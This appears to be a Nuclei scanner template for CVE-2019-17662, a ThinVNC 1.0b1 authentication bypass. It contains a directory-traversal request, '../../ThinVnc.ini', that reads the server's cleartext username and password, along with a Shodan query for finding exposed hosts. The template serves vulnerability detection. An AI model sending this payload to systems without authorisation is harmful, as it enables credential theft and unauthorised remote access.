id: CVE-2019-17662

info:
  name: ThinVNC 1.0b1 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the ThinVNC application.
  remediation: |
    Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
  reference:
    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
    - https://github.com/bewest/thinvnc/issues/5
    - https://redteamzone.com/ThinVNC/
    - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
    - https://github.com/YIXINSHUWU/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17662
    cwe-id: CWE-22
    epss-score: 0.68973
    epss-percentile: 0.97707
    cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cybelsoft
    product: thinvnc
    shodan-query: http.favicon.hash:-1414548363
  tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft

http:
  - raw:
      - |
        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "User="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - "application/binary"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a2d2bfd77c6df251e51f2a32a67da9013eb27be31b3497fdffbe27b4b9f86c91022100f32abcda610d82eba43442f13bdbc2e0eca61d37d67d25a971ba1faf54ca3218:922c64590222798bb761d5b6d8e72950